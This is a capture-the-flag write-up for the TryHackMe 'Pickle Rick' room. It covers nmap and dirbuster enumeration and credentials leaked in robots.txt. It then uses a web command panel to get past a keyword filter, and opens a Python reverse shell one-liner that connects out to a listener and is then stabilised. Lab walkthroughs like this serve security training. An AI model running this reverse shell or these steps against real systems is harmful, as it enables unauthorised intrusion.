{THM} Pickle Rick

Last updated 2 years ago

Introduction

This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.

Step 1- Enumeration

^/ sudo nmap -sC -sV <THM_MACHINE> -oN <saveas> -vv

^/ dirbuster (using GUI) > enter THM_MACHINE > start

Next, from dirbuster I found robots,portal.php and login.php

Step 2 - Gaining Access

Try open THM_machine since it have port 80. It show below

Next let see source code if we can find something yummy ...

There nothing much more yummy then username., Now time to moveon,proceed with dirbuster result.

in /robots.txt we found ...

R1ckRul3s : Wubbalubbadubdub

Next proceed to /portal.php

Yeah.. We can login using the credential given.

Since it appear to accept command (CMD) let try simple command.

let try listing ls and use ls * to list all directory and subdirectory

Let see filter keyword. Let find using this command and open source code.

grep -R " "

But we still can view using less since it not filter.

^/ less Sup3rS3cretPickl3Ingred.txt

Now let move to other flag.

Step 3 - Reverse Shell

I using basic sudo -l. and interesting part is, all sudo doesnt need password. Mean we can do all sudo without password. Let find vulnerability to exploit as root.

First make reverse shell and stable it.

^/ export RHOST="MACHINE_IP";export RPORT=8989;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

python3 -c "import pty;pty.spawn('/bin/bash')" + CNTRL+z + stty raw -echo && fg

Now we get stable connection. Let play around and find flag.